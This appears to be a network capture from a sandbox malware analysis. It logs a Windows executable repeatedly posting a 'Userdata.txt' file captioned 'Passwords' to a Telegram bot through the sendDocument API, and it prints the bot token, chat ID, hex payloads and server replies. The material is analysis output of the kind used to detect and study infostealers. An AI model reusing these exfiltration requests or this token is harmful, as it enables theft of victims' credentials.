2025-01-10 21:32:37 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 39 36 65 34 34 34 33 35 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3496e44435c9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:38 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:38 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43607,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544758,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.3	50050	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:39 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34c5bacc94c0 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:39 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 63 35 62 61 63 63 39 34 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34c5bacc94c0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:39 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:40 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43608,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544759,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.3	50052	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:41 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34f46a70432a Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:41 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 66 34 36 61 37 30 34 33 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34f46a70432aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:41 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:41 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43609,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544761,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.3	50054	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:43 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3537167c6af8 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:43 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 33 37 31 36 37 63 36 61 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3537167c6af8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:43 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:43 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:43 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43610,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544763,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.3	50056	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:44 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd357c0f145e3d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:44 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 37 63 30 66 31 34 35 65 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd357c0f145e3dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:45 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:45 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43611,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544765,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.3	50058	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:46 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd35b812061467 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:46 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 62 38 31 32 30 36 31 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd35b812061467Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:46 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:46 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43612,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544766,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.3	50060	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:48 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3602d21a3415 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:48 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 30 32 64 32 31 61 33 34 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3602d21a3415Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:48 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:48 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43613,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544768,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.3	50062	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:49 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd366edcb90021 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:49 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 36 65 64 63 62 39 30 30 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd366edcb90021Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:50 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:50 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
